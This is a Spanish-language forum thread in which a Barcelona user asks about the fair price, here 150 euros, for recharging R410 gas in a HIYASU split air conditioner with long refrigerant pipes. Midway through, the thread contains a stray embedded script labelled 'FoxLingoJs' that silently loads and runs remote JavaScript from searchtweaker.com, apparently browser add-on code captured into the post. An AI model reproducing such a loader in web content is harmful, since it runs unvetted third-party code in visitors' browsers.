Recarga Gas 410 - Aire Acondicionado HIYASU

Hace más o menos un año me instalaron en Barcelona- Spain un aire acondicionado HIYASU con un split que he notado que ni calentaba lo suficiente en invierno ni ahora está enfriando lo correcto. Lo más probable es que sea falta de gas por la longitud de los tubos, que es más de 6 metros. Así que mi pregunta es cuál sería el precio justo aproximado para recargarlo.

1 Respuesta

Respuesta

Yo hablaría con el instalador y que lo revise, por que no tiene que haber fugas en la instalación o la dejo mal en su momento

El instalador me dice que como son bastantes metros le falta gas, y que me cobra POR por hacerme la recarga, por eso quiero saber cuánto me tendría que costar en principio...Desde el principio me dijo que igual le faltaba gas...?¿

En principio los equipos viene para 5 mts si tiene mas de eso puede ser que necesite algo mas de gas, pero nunca una carga completa, y lo de cuanto es difícil pero dime cuanto te pide y hago algunas preguntas por mi cuenta y te digo

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();// ]]></script>

Pide 150 Euros. ¿Cómo lo ves?

Cuanto metros son los q

Cuanto metros son los que tiene la instalacion

Exactamente no lo sé pero puede que 7, máximo 8...

Si lo hace al principio si, pero ir ahora solo para eso no esta mal

No acabo de entender tu respuesta, si hubiera puesto al principio toda la carga de gas? No era esa su función? O en realidad si son más metros hay que hacerle la recarga con el precio aparte?

Normalmente el precio que se suele dar es para instalaciones de 5 metros o menos, pero si el vio la instalación y vio que necesitaba mas gas lo tenia que haber previsto, me entiendes, eso es cuando vas y te dan un precio de un aparato de aire con instalación incluida siempre es para menos de 5 metros

Ok, entonces, 150 EUR no lo ves mal para hacer ahora una recarga, entiendo.

Exacto